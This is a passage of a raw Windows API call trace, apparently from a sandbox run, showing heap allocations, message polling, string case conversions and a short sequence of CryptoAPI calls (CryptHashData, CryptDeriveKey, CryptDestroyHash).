[0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0198.845] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0198.845] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.845] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0198.845] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0198.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe) returned 0x2aaadb0 [0198.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaadb0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0198.845] CryptHashData (hHash=0x9e1db8, pbData=0x2a72778, dwDataLen=0x3, dwFlags=0x1) returned 1 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0198.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0198.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0198.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0198.846] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0198.846] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabd0 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0198.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0198.846] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0198.847] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.847] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0198.847] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0198.847] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0198.847] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0198.847] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.847] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0198.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0198.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0198.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf) returned 0x2aaad08 [0198.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaad08, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0198.848] CryptDeriveKey (in: hProv=0xa7c440, Algid=0x6601, hBaseData=0x9e1db8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0198.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0198.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0198.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0198.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0198.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0198.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0198.849] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0198.849] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0198.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0198.849] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0198.849] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0198.850] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0198.850] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0198.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f6e80 [0198.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6e80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0198.850] CryptDestroyHash (hHash=0x9e1db8) returned 1 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0198.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0198.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0198.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0198.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75160 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0198.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0198.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0198.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0198.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0198.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0198.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0198.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0198.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 